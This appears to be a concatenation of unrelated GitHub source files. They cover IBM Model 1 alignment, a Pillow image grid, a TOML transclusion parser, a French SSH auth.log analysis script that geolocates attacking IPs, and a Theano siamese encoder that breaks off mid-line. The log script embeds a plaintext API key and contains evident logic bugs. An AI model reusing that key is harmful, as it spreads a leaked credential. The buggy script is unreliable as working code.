OUTPUT:\n    AM : (dictionary) alignment model structure\n\n    The dictionary AM is a dictionary of dictionaries where AM['english_word']['foreign_word']\n    is the computed expectation that the foreign_word is produced by english_word.\n\n    AM['house']['maison'] = 0.5\n    \"\"\"\n    AM = {}\n    data = {} # a dictionary keeping track of corresponding English-French translations\n    # Read training data\n    train_corpus = read_hansard(train_dir, num_sentences)\n    # print('finish AM reading')\n    # count all possible English-French translations\n    for pair in train_corpus:\n        data_sent = initialize(pair)\n        for key in data_sent:\n            # only add unique French words to the list\n            if key in data:\n                for word in data_sent[key]:\n                    if word not in data[key]:\n                        data[key].append(word)\n            else:\n                data[key] = data_sent[key]\n\n    # Initialize AM uniformly\n    # Set tcount(f, e) and total(e) to 0 first for reference\n    tcount_init = {}\n    total_init = {}\n\n    for e_word in data:\n        AM[e_word] = {}\n        tcount_init[e_word] = {}\n        total_init[e_word] = 0\n        count = len(data[e_word])\n        for f_word in data[e_word]:\n            AM[e_word][f_word] = 1/count\n            tcount_init[e_word][f_word] = 0\n    # print('finish AM initialization')\n\n    # Iterate between E and M steps\n    for _ in range(max_iter):\n        # build fresh zeroed copies every iteration; plain assignment (tcount = tcount_init)\n        # would alias the dictionaries and carry expected counts over between EM iterations\n        tcount = {e: dict.fromkeys(tcount_init[e], 0) for e in tcount_init}\n        total = dict.fromkeys(total_init, 0)\n        for pair in train_corpus:\n            F = Counter(pair[0].split()[1:-1])\n            for f in F:\n                denom_c = 0\n                E = Counter(pair[1].split()[1:-1])\n                for e in E:\n                    denom_c += AM[e][f] * F[f]\n                for e in E:\n                    tcount[e][f] += AM[e][f] * F[f] * E[e] / denom_c\n                    total[e] += 
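The E/M loop implements IBM Model 1: expected counts tcount(e,f) are accumulated in the E-step just above, then renormalized into t(f|e) in the M-step just below. A tiny self-contained run on a classic two-pair toy corpus (not the Hansard data):

```python
from collections import defaultdict

pairs = [(['la', 'maison'], ['the', 'house']),
         (['la', 'fleur'], ['the', 'flower'])]
english = {e for _, es in pairs for e in es}
t = {e: defaultdict(lambda: 0.25) for e in english}    # uniform init, like AM above

for _ in range(5):
    tcount = {e: defaultdict(float) for e in english}  # fresh zero counts each iteration
    total = defaultdict(float)
    for fs, es in pairs:                               # E-step: expected counts
        for f in fs:
            denom = sum(t[e][f] for e in es)
            for e in es:
                tcount[e][f] += t[e][f] / denom
                total[e] += t[e][f] / denom
    for e in english:                                  # M-step: renormalize
        for f in tcount[e]:
            t[e][f] = tcount[e][f] / total[e]

print(round(t['house']['maison'], 3))  # well above the uniform 0.25, climbing toward 1.0
```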
AM[e][f] * F[f] * E[e] / denom_c\n for e in total:\n for f in tcount[e]:\n AM[e][f] = tcount[e][f] / total[e]\n\n AM['SENTSTART'] = {'SENTSTART':1}\n AM['SENTEND'] = {'SENTEND':1}\n #Save Model\n with open(fn_AM+'.pickle', 'wb') as handle:\n pickle.dump(AM, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n return AM\n\n# ------------ Support functions --------------\ndef read_hansard(train_dir, num_sentences):\n \"\"\"\n Read up to num_sentences from train_dir.\n\n INPUTS:\n train_dir : (string) The top-level directory name containing data\n e.g., '/u/cs401/A2_SMT/data/Hansard/Testing/'\n num_sentences : (int) the maximum number of training sentences to consider\n\n\n Make sure to preprocess!\n Remember that the i^th line in fubar.e corresponds to the i^th line in fubar.f.\n\n Make sure to read the files in an aligned manner.\n \"\"\"\n sent_count = 0\n data = []\n for subdir, dirs, files in os.walk(train_dir):\n # assume we only have pairs of .e and .f file with same file name\n file_names = []\n # first preprocess to get array of file name pair\n for file in files:\n if file[:-2] not in file_names:\n file_names.append(file[:-2])\n for file in file_names:\n eng_f = os.path.join(subdir, file + '.e')\n fre_f = os.path.join(subdir, file + '.f')\n data_e = []\n data_f = []\n with open(eng_f, 'r') as f:\n data_e = f.readlines()\n with open(fre_f, 'r') as f:\n data_f = f.readlines()\n assert len(data_e) == len(data_f), \\\n \"English file and French file have different length!\\nFile name: \" + file\n\n for line in range(len(data_e)):\n pre = (preprocess(data_f[line][:-1], 'f'), preprocess(data_e[line][:-1], 'e'))\n data.append(pre)\n sent_count += 1\n if sent_count >= num_sentences:\n return data\n return data\n\ndef initialize(pair):\n \"\"\"\n INPUT:\n pair: a French-English alignment\n\n OUTPUT:\n data: a dictionary that use English word as key and track all possible unique coresponding\n French words\n\n Initialize alignment model uniformly.\n Only set non-zero probabilities where word pairs appear in corresponding sentences.\n \"\"\"\n data = {}\n # remove SENTSTART and SENTEND\n fre = pair[0].split()[1:-1]\n eng = pair[1].split()[1:-1]\n for word in eng:\n if word not in data:\n data[word] = []\n for f_word in fre:\n if f_word not in data[word]:\n data[word].append(f_word)\n return data\n","repo_name":"jerryczy/csc401_nlp","sub_path":"statistical_machine_translation/align_ibm1.py","file_name":"align_ibm1.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1326170673","text":"import PIL\nfrom PIL import ImageFont\nfrom PIL import Image\nfrom PIL import ImageDraw\n\n# read image and convert to RGB\nimage = Image.open(\"readonly/msi_recruitment.gif\")\nimage = image.convert('RGB')\n\nwidth = image.size[0]\nheight = image.size[1]\n\nimg = Image.new('RGB', (width, height + 60), (0, 0, 0))\nimages = []\nintensity = [0.1, 0.5, 0.9]\n\nx = 20\ny = height\nword_size = 50\nword_css = \"readonly/fanwood-webfont.ttf\"\nsetFont = ImageFont.truetype(word_css, word_size)\n\nfor i in range(3):\n for j in range(3):\n for x in range(width):\n for y in range(height):\n pixel = image.getpixel((x, y))\n if i == 0:\n r = int(pixel[0] * intensity[j])\n g = pixel[1]\n b = pixel[2]\n img.putpixel((x, y), (r, g, b))\n if i == 1:\n r = pixel[0]\n g = int(pixel[1] * intensity[j])\n b = pixel[2]\n img.putpixel((x, y), (r, g, b))\n if i == 2:\n r = pixel[0]\n g = pixel[1]\n b = int(pixel[2] * intensity[j])\n 
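The triple getpixel/putpixel loop in the contact-sheet script scales one RGB channel at a time, pixel by pixel. Pillow's `Image.point` can apply the same per-band scaling through a lookup table in a single call; a small equivalent sketch (the solid test image is a stand-in for one GIF frame):

```python
from PIL import Image

image = Image.new('RGB', (64, 64), (120, 180, 240))   # stand-in for one frame
intensity = 0.5
channel = 0                                           # 0=R, 1=G, 2=B

# one 256-entry lookup table per band; only the chosen band is scaled
lut = []
for band in range(3):
    scale = intensity if band == channel else 1.0
    lut.extend(int(v * scale) for v in range(256))

adjusted = image.point(lut)
print(adjusted.getpixel((0, 0)))   # -> (60, 180, 240)
```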
img.putpixel((x, y), (r, g, b))\n\n draw = ImageDraw.Draw(img)\n strs = \"channel \" + str(i) + \" intensity \" + str(intensity[j])\n draw.text((0, height), strs, font=setFont, fill=(255, 255, 255), direction=None)\n\n images.append(img)\n img = Image.new('RGB', (width, height + 60), (0, 0, 0))\n\n# create a contact sheet from different brightnesses\nfirst_image = images[0]\ncontact_sheet = PIL.Image.new(first_image.mode, (first_image.width * 3, first_image.height * 3))\nx = 0\ny = 0\n\nfor img in images:\n # Lets paste the current image into the contact sheet\n contact_sheet.paste(img, (x, y))\n # Now we update our X position. If it is going to be the width of the image, then we set it to 0\n # and update Y as well to point to the next \"line\" of the contact sheet.\n if x + first_image.width == contact_sheet.width:\n x = 0\n y = y + first_image.height\n else:\n x = x + first_image.width\n\n# resize and display the contact sheet\ncontact_sheet = contact_sheet.resize((int(contact_sheet.width / 2), int(contact_sheet.height / 2)))\ndisplay(contact_sheet)\n","repo_name":"DimonYin/Coursera_Courses_Dimon_Yin","sub_path":"Python 3 Programming Specialization/Python Project _pillow _tesseract and opencv/Assignment 1_Building a Better Contact Sheet.py","file_name":"Assignment 1_Building a Better Contact Sheet.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10927681739","text":"# -*- coding: utf-8 -*-\n\"\"\"Additional Source to transclude tomlkit with URL and files.\"\"\"\n\nfrom pathlib import Path\nfrom textwrap import dedent as _\nfrom typing import Optional\nfrom typing import Union\n\nfrom tomlkit.parser import Parser as BaseParser\nfrom tomlkit.toml_document import TOMLDocument\n\nfrom drytoml import logger\nfrom drytoml.locate import deep_find\nfrom drytoml.merge import TomlMerger\nfrom drytoml.types import Url\nfrom drytoml.utils import request\n\nDEFAULT_EXTEND_KEY = \"__extends\"\n\n\nclass Parser(BaseParser):\n \"\"\"Extend tomlkit parser to allow transclusion.\"\"\"\n\n def __init__(\n self,\n string: str,\n extend_key=DEFAULT_EXTEND_KEY,\n reference: Optional[Union[str, Path, Url]] = None,\n level=0,\n ):\n \"\"\"Construct a transclusion-enabled toml parser.\n\n Args:\n string: Raw toml content.\n extend_key: key to look for to init transclusion.\n reference: Reference for the source of the content\n (eg url, file, etc).\n level: Number of parent documents previously parsed to\n instantiate this.\n \"\"\"\n self.extend_key = extend_key\n self.reference = reference or Path.cwd()\n self.from_string = not reference\n self.level = level\n super().__init__(string)\n\n def __repr__(self) -> str:\n \"\"\"Enable parser visual differentiation from repr.\n\n Returns:\n A string of the form ``Parser(reference, extend_key)``\n\n Examples:\n\n >>> parser = Parser.from_file(\"pyproject.toml\")\n >>> parser\n Parser('pyproject.toml', extend_key='__extends')\n\n >>> content = parser.parse().as_string()\n >>> Parser(content)\n Parser('/path/to/dir' as cwd, (from string), extend_key='__extends')\n\n >>> Parser.factory(\"https://github.com/pytest-dev/pytest/blob/master/pyproject.toml\")\n Parser('https://github.com/pytest-dev/pytest/blob/master/pyproject.toml', extend_key='__extends')\n \"\"\"\n return \"{}Parser('{}'{}, extend_key='{}')\".format(\n self._log_indent,\n self.reference,\n \" as cwd, (from string)\" if self.from_string else \"\",\n self.extend_key,\n )\n\n @classmethod\n def 
from_file(cls, path, extend_key=DEFAULT_EXTEND_KEY, level=0):\n \"\"\"Instantiate a parser from file.\n\n Args:\n path: Path to an existing file with the toml contents.\n extend_key: kwarg to construct the parser.\n level: kwarg to construct the parser.\n\n Returns:\n Parser instantiated from received path.\n\n \"\"\"\n with open(path) as fp:\n raw = fp.read()\n return cls(raw, extend_key=extend_key, reference=path, level=level)\n\n @classmethod\n def from_url(cls, url, extend_key=DEFAULT_EXTEND_KEY, level=0):\n \"\"\"Instantiate a parser from url.\n\n Args:\n url: URL to an existing file with the toml contents.\n extend_key: kwarg to construct the parser.\n level: kwarg to construct the parser.\n\n Returns:\n Parser instantiated from received url.\n \"\"\"\n raw = request(url)\n return cls(raw, extend_key=extend_key, reference=url, level=level)\n\n @classmethod\n def factory(\n cls,\n reference: Union[str, Url, Path],\n extend_key=DEFAULT_EXTEND_KEY,\n parent_reference: Optional[Union[str, Path, Url]] = None,\n level=0,\n ):\n \"\"\"Instantiate a parser from url, string, or path.\n\n Args:\n reference: Existing file/url/path with the toml contents.\n extend_key: kwarg to construct the parser.\n parent_reference: Used to parse relative paths.\n level: kwarg to construct the parser.\n\n Returns:\n Parser instantiated from received reference.\n\n Raises:\n ValueError: Attempted to intantiate a parser with a relative\n path as reference, without a parent reference.\n \"\"\"\n\n if Url.validate(reference):\n return cls.from_url(\n reference,\n extend_key=extend_key,\n level=level,\n )\n\n path = Path(reference)\n if not path.is_absolute():\n if not parent_reference:\n raise ValueError(\"Must supply absolute path or parent\")\n path = (parent_reference.parent / path).resolve()\n\n return cls.from_file(path, extend_key=extend_key, level=level)\n\n @property\n def _log_indent(self):\n return \" \" * 2 * self.level\n\n def _log_document(self, document):\n raw = document.as_string()\n return _(\n f\"\"\"\n{\"=\"*30}{self} CONTENTS STARTS HERE{\"=\"*30}\n{raw}\n{\"=\"*30}{self} CONTENTS END HERE{\"=\"*30}\"\"\"\n ).replace(\"\\n\", f\"\\n{self._log_indent}\")\n\n def parse(self) -> TOMLDocument:\n \"\"\"Parse recursively until no transclusions are required.\n\n Returns:\n The parsed, transcluded document.\n \"\"\"\n document = super().parse()\n logger.info(\"%s: Parsing started\", self)\n logger.debug(\n \"%s: Source contents:\\n\\n%s\", self, self._log_document(document)\n )\n\n while True:\n base_key_locations = sorted(\n deep_find(document, self.extend_key),\n key=lambda path_ct: path_ct[0],\n )\n\n if not base_key_locations:\n logger.debug(\"%s: No %s found\", self, self.extend_key)\n break\n logger.info(\n \"%s: Found '%s': at %s\",\n self,\n self.extend_key,\n [\n \".\".join(crumbs_val[0]) or \"(document root)\"\n for crumbs_val in base_key_locations\n ],\n )\n\n for breadcrumbs, value in base_key_locations:\n logger.debug(\n \"%s: Before merging %s contents:\\n\\n%s\",\n self,\n breadcrumbs,\n self._log_document(document),\n )\n merge = TomlMerger(document, self)\n merge(value, breadcrumbs, delete_dangling=True)\n logger.debug(\n \"%s: After merging %s contents:\\n\\n%s\",\n self,\n breadcrumbs,\n self._log_document(document),\n )\n\n logger.info(\"%s: Parsing finished\", self)\n logger.debug(\n \"%s: Final contents:\\n\\n%s\",\n self,\n self._log_document(document),\n )\n return 
document\n","repo_name":"pwoolvett/drytoml","sub_path":"src/drytoml/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34984922189","text":"#python\n# -*- coding: utf-8 -*-\n#log.v4.py : afficher \n\nimport operator\nimport collections\nfrom typing import OrderedDict\nimport urllib.request\nimport json \n\n#dictionnaire \n\ni = 0\nvalid_user = {}\ninvalid_user = {}\nIp = {}\n\n# ouverture du fichier big.log, localisation et serie1.js on va ouvrir le serie2.js plus tard.\ntext = open('fichier\\\\auth.big.log', 'r')\nlocalisation = open('highcharts\\\\localisations2.js', 'w')\nserie1 = open('highcharts\\\\serie1.js', 'w')\n\n\n\nerreur = \"Invalid user\"\nerreur_2 = \"Failed password\"\nerreur_3 = \"Failed password for invalid user\"\n\n#si il y'a des erreurs alors prendre la bonne valeurs de position du mot \n\nfor line in text:\n mot = line.split(' ')\n \n if erreur in line:\n IPV4 = mot [9]\n utilisateur = mot [7]\n # si l'erreur invalid user est detectée alors l'utilisateur et le 7eme mot et l'IPV4 est le 9 mot\n if utilisateur in invalid_user.keys():\n invalid_user[utilisateur] = invalid_user[utilisateur] + 1\n else:\n invalid_user[utilisateur] = 1\n # si l'utilisateur est un utilisateur invalid alors on rajoute un et si on l'a jamais eu avant, le rajouter.\n elif erreur_3 in line:\n IPV4 = mot [12] \n # si l'erreur trois est détecté l'Ipv4 sera le 12eme mots \n elif erreur_2 in line:\n IPV4 = mot [10]\n utilisateur = mot[8]\n # si l'erreur deux est détectée l'ipv4 sera le 10eme mot et l'utilisateur est le 8eme mot \n \n else:\n continue # sinon continuer \n \n if IPV4 in Ip.keys():\n Ip[IPV4] = Ip[IPV4] + 1\n # si l'ipv4 est déjà dans notre liste alors on l'ajoute à la au même utilisateur \n \n else:\n Ip[IPV4] = 1\n # si on a jamais eu l'adresse IPV4 alors on l'ajoute à notre liste\n\n # nous voulons sortir tout d'abord les invalid_users \n\nprint ('invalid_users') # j'écris des print pour vérifier les étapes pendant l'execution de notre script \n\n # permet de faire le tri des 'invalid_users' \n\ninvalid_user = sorted(invalid_user.items(), key=operator.itemgetter(1),reverse=True)\nvar = collections.OrderedDict(invalid_user)\n\n\n # nous devons écrire le début du texte pour que le diagramme marche correctement\n\n\nserie1.write(\"\"\"Highcharts.chart('serie1',\n{\n chart: {\n type: 'pie'\n },\n\t\ttitle: {\n\t\t\ttext: 'Analyse de auth.log'\n\t\t},\n\t\tsubtitle: {\n\t\t\ttext: 'Users inconnu utilise pour des attaques SSH'\n\t\t},\n series: [{\n data: [ \"\"\")\n\nj = 0 \n # nous voulons écrire les 13 premiers utilisateurs et après écrire les autres \nwhile j <= 13:\n j += 1 \n # écrire chaque clés et chaque valeurs pour les invalid_user\n i += 1 \n cle = (list(var.keys())[i-1])\n valeur = (list(var.values())[i-1])\n\n \n serie1.write('\\n [ \\'{}\\' , {}], \\n'.format(cle,valeur))\n\n \n #sortir les invalid user \nserie1.write(\"\"\"\\n]\n\\n }]\n\\n });\n\"\"\")\n\n # fermeture du fichier 1\nserie1.close()\n\n\nprint(\"End (invalid_users)\")\n\n #trouver dans les lignes du big_log les utilisateurs valid avec les Ip correspondante\n\n\n \n # il faut maintenant s'occuper des valid_user \nprint('valid_users')\n\n #ouverture du fichier series2.js\nserie2 = open('highcharts\\\\serie2.js', 'w')\n\n #l'utilisateur se retrouve sur le 6 mot\nfor line in text:\n mot = line.split(' ')\n utilisateur = mot [6]\n\n #triage du dictionnaire valid_user \nvalid_user 
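Typical use of the transclusion parser defined in this module: build it via `from_file`, `from_url`, or `factory`, then call `parse()`. A short usage sketch, assuming a pyproject.toml whose tables carry the default `__extends` key (the path is illustrative):

```python
from drytoml.parser import Parser

parser = Parser.from_file("pyproject.toml")   # or Parser.factory(<path or URL>)
document = parser.parse()                     # recursively merges every "__extends" source
print(document.as_string())                   # plain TOML with transclusions resolved
```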
= sorted(valid_user.items(), key=operator.itemgetter(1),reverse=True)\nvar = collections.OrderedDict(valid_user)\n\n #écrire dans le fichier serie2.js pour avoir le resultat sous forme de diagramme \nserie2.write(\"\"\"Highcharts.chart('serie2',\n{\n chart: {\n type: 'pie'\n },\n\t\ttitle: {\n\t\t\ttext: 'Analyse de auth.log'\n\t\t},\n\t\tsubtitle: {\n\t\t\ttext: 'Users connu utilise pour des attaques SSH'\n\t\t},\n series: [{\n data: [ \"\"\")\n\n\nfor key, valeur in var.items():\n #sortir les valid user \n i += 1 \n cle = (list(var.keys())[i-1])\n valeur = (list(var.values())[i-1])\n\n \nserie2.write('[ \\'{}\\' , {}], \\n'.format(cle,valeur)) # écrire la clé et la valeur \n\n # écrire dans la fin du fichier pour pouvoir écrire correctement dans le diagramme \nserie2.write(\"\"\"\\n] \n\\n }]\n\\n });\n\"\"\")\n\ni = 0\n \nprint(\"end (valid_users)\")\n\n\n # fermeture du fichier2.py \n\nserie2.close()\n\nprint('ip')\n\n # trier les Ip ordre décroissant\nIp = sorted(Ip.items(), key=operator.itemgetter(1),reverse=True)\nvar = collections.OrderedDict(Ip)\n\n # écriture du début du fichier \n\nlocalisation.write('var locations =[') # début d'écriture sur notre fichier localisation2.js\nAPI = '3a2b5be0-75a0-11ec-acd1-89ce18e6dbfe' # ma clé API \nURL = \"https://geolocation-db.com/json/\" # URL de notre site de géolocalisation d'ip qu'on a exploser XD\nruz = 0\nfor key, valeur in var.items():\n \n \n i += 1 \n cle = (list(var.keys())[i-1])\n valeur = (list(var.values())[i-1])\n # refaire comme dans le log.v4.py, afficher l'ip et enfin la latitude et longtitude pour l'afficher encore sur notre superbe carte \n with urllib.request.urlopen(\"{}/{}/{}\".format(URL,API,cle)) as url:\n data = json.loads(url.read().decode())\n \n\n # prendre l'ip la latitude et la longitude \n\n if data['latitude'] != 'Not found' or data['longitude'] != 'Not found': # on traite ce fichier avec une erreur not found pour éviter de faire planter le python\n localisation.write('\\n [\"{} ({} attaques)\", {}, {}],'.format(cle, valeur, data['latitude'], data['longitude'])) # on affiche l'ip et le reste pour la carte \n\n\n# j'écris une ] à la fin pour pouvoir avoir le fichier localisation deux qui marche correctement \n \nlocalisation.write('\\n]')\n\n\n# je print end (ip) pour vérifier ou en est l'execution du fichier car c'est long :)\n\nprint(\"end (ip)\")\n\n\n\n\n# fermeture du fichier Big.log et du fichier localisation.js\ntext.close()\nlocalisation.close()\n\n","repo_name":"lucas04200/LOG","sub_path":"log.v5.py","file_name":"log.v5.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41892414396","text":"import time\nfrom collections import defaultdict\nfrom itertools import chain, permutations\n\nimport numpy as np\nimport theano\nfrom scipy.spatial.distance import pdist\nfrom theano import tensor as T\nfrom theano.tensor.shared_randomstreams import RandomStreams\nfrom tqdm import trange\n\nfrom encoders.token.tokendata import TokenAutoencoderDatasetExtractor\n\ntheano.config.floatX = \"float32\"\n\nfrom encoders.baseencoder import AbstractEncoder\nfrom data.dataimport import import_data\nfrom data.featuredict import get_empirical_distribution\nfrom deeplearning.layers import GRU, AveragingGRU\nfrom deeplearning.optimization import nesterov_rmsprop_multiple\nfrom deeplearning.utils import Bunch\n\n\nclass SequenceGruSiameseEncoderModel:\n \"\"\"\n A sequence GRU siamese encoder\n \"\"\"\n\n def __init__(self, 
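log.v5.py resolves each attacker IP through geolocation-db.com before writing the map markers. One lookup in isolation, mirroring the URL shape used in the script; the API key below is a placeholder, and the response fields (`latitude`, `longitude`, the `'Not found'` sentinel) are taken from the script rather than independently verified:

```python
import json
import urllib.request

URL = "https://geolocation-db.com/json/"
API = "YOUR-API-KEY"                     # placeholder; the script embeds its own key
ip = "8.8.8.8"

with urllib.request.urlopen(f"{URL}/{API}/{ip}") as resp:
    data = json.loads(resp.read().decode())

if data.get('latitude') != 'Not found':
    print(ip, data['latitude'], data['longitude'])
```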
embedding_size: int, vocabulary_size: int, empirical_distribution, representation_size: int,\n hyperparameters: dict, encoder_type: str, name: str = \"GRUSequenceSiameseEncoder\", use_centroid=False):\n self.__hyperparameters = hyperparameters\n self.__name = name\n log_init_noise = self.__hyperparameters[\"log_init_noise\"]\n\n self.__memory_size = representation_size\n self.__embedding_size = embedding_size\n self.__vocabulary_size = vocabulary_size\n self.__empirical_distribution = empirical_distribution\n self.__encoder_type = encoder_type\n\n embeddings = np.random.randn(vocabulary_size, embedding_size) * 10 ** log_init_noise\n self.__embeddings = theano.shared(embeddings.astype(theano.config.floatX), name=name + \":embeddings\")\n self.__name_bias = theano.shared(np.log(empirical_distribution).astype(theano.config.floatX),\n name=name + \":name_bias\")\n\n encoder_init_state = np.random.randn(representation_size) * 10 ** log_init_noise\n self.__encoder_init_state = theano.shared(encoder_init_state.astype(theano.config.floatX),\n name=name + \":encoder_init_state\")\n\n self.__rng = RandomStreams()\n\n self.__input_sequence = T.ivector(name + \":input_sequence\")\n\n if encoder_type == 'gru':\n self.__encoder = GRU(self.__embeddings, representation_size, embedding_size,\n self.__hyperparameters, self.__rng, name=name + \":GRUSequenceEncoder\",\n use_centroid=use_centroid)\n elif encoder_type == 'averaging_gru':\n self.__encoder = AveragingGRU(self.__embeddings, representation_size, embedding_size,\n self.__hyperparameters, self.__rng,\n name=name + \":AveragingGRUSequenceEncoder\", use_centroid=use_centroid)\n else:\n raise Exception(\"Unrecognized encoder type `%s`, possible options `gru` and `averaging_gru`\")\n\n self.__params = {\"embeddings\": self.__embeddings,\n \"encoder_init_state\": self.__encoder_init_state}\n self.__params.update(self.__encoder.get_params())\n\n @property\n def rng(self):\n return self.__rng\n\n @property\n def parameters(self):\n return self.__params\n\n @property\n def input_sequence_variable(self):\n return self.__input_sequence\n\n def get_encoding(self):\n \"\"\"\n Return the encoding of the sequence.\n \"\"\"\n encoded_rep = self.__encoder.get_encoding(self.__input_sequence, self.__encoder_init_state)\n return encoded_rep\n\n def copy_full(self, name):\n copy = SequenceGruSiameseEncoderModel(self.__embedding_size, self.__vocabulary_size,\n self.__empirical_distribution,\n self.__memory_size, self.__hyperparameters, self.__encoder_type,\n name=name)\n copy.__name_bias = self.__name_bias\n copy.__embeddings = self.__embeddings\n copy.__encoder_init_state = self.__encoder_init_state\n copy.__rng = self.__rng\n copy.__encoder = self.__encoder\n copy.__params = dict\n return copy\n\n\nclass SequenceGruSiameseEncoder(AbstractEncoder):\n \"\"\"\n Train an encoder\n \"\"\"\n\n def __init__(self, training_file, hyperparameters, encoder_type='gru', use_centroid=False):\n \"\"\"\n\n :param training_file:\n :type hyperparameters: dict\n :return:\n \"\"\"\n self.__hyperparameters = hyperparameters\n\n self.dataset_extractor = TokenAutoencoderDatasetExtractor(training_file)\n\n empirical_distribution = get_empirical_distribution(self.dataset_extractor.feature_map,\n chain(*self.dataset_extractor.get_nonnoisy_samples(\n import_data(training_file))))\n self.__encoder = SequenceGruSiameseEncoderModel(self.__hyperparameters[\"embedding_size\"],\n len(self.dataset_extractor.feature_map),\n empirical_distribution,\n self.__hyperparameters[\"representation_size\"],\n 
self.__hyperparameters, encoder_type=encoder_type,\n use_centroid=use_centroid)\n\n self.__trained_parameters = None\n self.__compiled_methods = None\n\n REQUIRED_HYPERPARAMETERS = {'log_learning_rate', 'rmsprop_rho', 'momentum', 'grad_clip', 'minibatch_size',\n 'embedding_size', 'representation_size', 'log_init_noise', 'dropout_rate'}\n\n def __get_siamese_loss(self, use_dropout, scale_similar=1, scale_dissimilar=1):\n encoder_copy = self.__encoder.copy_full(name=\"siameseEncoder\")\n encoding_1 = self.__encoder.get_encoding()\n encoding_2 = encoder_copy.get_encoding()\n\n representation_distance = (encoding_1 - encoding_2).norm(2)\n similar_loss = -scale_similar * T.pow(representation_distance, 2)\n margin = self.__hyperparameters['dissimilar_margin']\n dissimilar_loss = -scale_dissimilar * T.pow(T.nnet.relu(margin - representation_distance), 2)\n return dissimilar_loss, similar_loss, encoder_copy, encoding_1, encoding_2\n\n def __compile_train_functions(self):\n dissimilar_loss, similar_loss, encoder_copy, repr1, repr2 = self.__get_siamese_loss(True)\n\n wrt_vars = list(self.__encoder.parameters.values())\n\n grad_acc = [theano.shared(np.zeros(param.get_value().shape).astype(theano.config.floatX)) for param in wrt_vars] \\\n + [theano.shared(0, name=\"sample_count\")]\n\n grad = T.grad(similar_loss, wrt_vars)\n self.__compiled_methods.grad_siamese_similar = theano.function(\n inputs=[encoder_copy.input_sequence_variable, self.__encoder.input_sequence_variable],\n updates=[(v, v + g) for v, g in zip(grad_acc, grad)] + [\n (grad_acc[-1], grad_acc[-1] + 1)],\n outputs=[similar_loss, repr1, repr2])\n\n grad = T.grad(dissimilar_loss, wrt_vars)\n self.__compiled_methods.grad_siamese_dissimilar = theano.function(\n inputs=[encoder_copy.input_sequence_variable, self.__encoder.input_sequence_variable],\n updates=[(v, v + g) for v, g in zip(grad_acc, grad)] + [\n (grad_acc[-1], grad_acc[-1] + 1)],\n outputs=[dissimilar_loss, repr1, repr2])\n\n normalized_grads = [T.switch(grad_acc[-1] > 0, g / grad_acc[-1].astype(theano.config.floatX), g) for g in\n grad_acc[:-1]]\n step_updates, ratios = nesterov_rmsprop_multiple(wrt_vars, normalized_grads,\n learning_rate=10 ** self.__hyperparameters[\n \"log_learning_rate\"],\n rho=self.__hyperparameters[\"rmsprop_rho\"],\n momentum=self.__hyperparameters[\"momentum\"],\n grad_clip=self.__hyperparameters[\"grad_clip\"],\n output_ratios=True)\n step_updates.extend([(v, T.zeros(v.shape)) for v in grad_acc[:-1]]) # Set accumulators to 0\n step_updates.append((grad_acc[-1], 0))\n\n self.__compiled_methods.grad_step = theano.function(inputs=[], updates=step_updates, outputs=ratios)\n\n def __compile_test_functions(self):\n dissimilar_loss, similar_loss, encoder_copy, _, _ = self.__get_siamese_loss(False)\n self.__compiled_methods.test_similar_loss = theano.function(\n inputs=[encoder_copy.input_sequence_variable, self.__encoder.input_sequence_variable], outputs=similar_loss)\n self.__compiled_methods.test_dissimilar_loss = theano.function(\n inputs=[encoder_copy.input_sequence_variable, self.__encoder.input_sequence_variable],\n outputs=dissimilar_loss)\n\n self.__compiled_methods.encode = theano.function(inputs=[self.__encoder.input_sequence_variable],\n outputs=self.__encoder.get_encoding())\n\n def __compile_if_needed(self):\n if self.__compiled_methods is None:\n print(\"Compiling Methods...\")\n self.__compiled_methods = Bunch()\n self.__compile_train_functions()\n self.__compile_test_functions()\n print(\"Compilation Finished...\")\n\n def train(self, 
training_file: str, validation_file: str, max_iter: int = 1000, patience: int = 25,\n              validation_check_limit: int = 1, additional_code_to_run=None) -> tuple:\n        self.__compile_if_needed()\n\n        minibatch_size = self.__hyperparameters[\"minibatch_size\"]\n        training_data = import_data(training_file)\n        training_set = list(self.dataset_extractor.get_dataset_for_encoder(training_data, return_num_tokens=True))\n        validation_set = list(\n            self.dataset_extractor.get_dataset_for_encoder(import_data(validation_file), return_num_tokens=True))\n        best_score = float('-inf')\n        train_x_ent = 0\n        epochs_not_improved = 0\n        historic_values = []\n\n        trainable_parameters = list(self.__encoder.parameters.values())\n\n        print(\"Num classes: %s\" % self.dataset_extractor.num_equivalence_classes)\n\n        def compute_validation_score() -> float:\n            return compute_score(validation_set)\n\n        def compute_score(dataset) -> float:\n            # Get all encodings\n            encodings = []\n            equivalents = defaultdict(set)\n            for i, tree in enumerate(dataset):\n                encodings.append(self.__compiled_methods.encode(tree[0]))\n                equivalents[tree[2]].add(i)\n\n            encodings = np.array(encodings, dtype=theano.config.floatX)\n            distances = pdist(encodings, metric='euclidean')\n\n            is_similar = np.zeros_like(distances, dtype=np.int)\n            for equivalence_set in equivalents.values():\n                for i, j in permutations(equivalence_set, 2):\n                    if i > j:\n                        is_similar[encodings.shape[0] * j - int(j * (j + 1) / 2) + i - 1 - j] = 1\n\n            similar_score = -np.sum(np.power(distances * is_similar, 2))\n\n            margin = self.__hyperparameters['dissimilar_margin']\n            differences = margin - distances\n            rectified_diffs = differences * (differences > 0)\n            dissimilar_score = -np.sum(np.power(rectified_diffs * (1 - is_similar), 2))\n\n            print(\"Similar Loss: %s Dissimilar Loss: %s\" % (-similar_score, -dissimilar_score))\n            return similar_score + dissimilar_score\n\n        if self.__trained_parameters is None:\n            best_score = float('-inf')\n        else:\n            best_score = compute_validation_score()\n            print(\"Previous best validation score: %s\" % best_score)\n\n        try:\n            print(\"[%s] Training Started...\" % time.asctime())\n            sum_similar_loss = 0\n            num_similar_loss = 0\n            sum_dissimilar_loss = 0\n            num_dissimilar_loss = 0\n            ratios = np.zeros(len(list(self.__encoder.parameters.values())))\n            epochs_not_improved = 0\n            # Clump minibatches and disallow minibatches that are smaller than their given size, since they may\n            # cause instability.\n            num_minibatches = max(1, 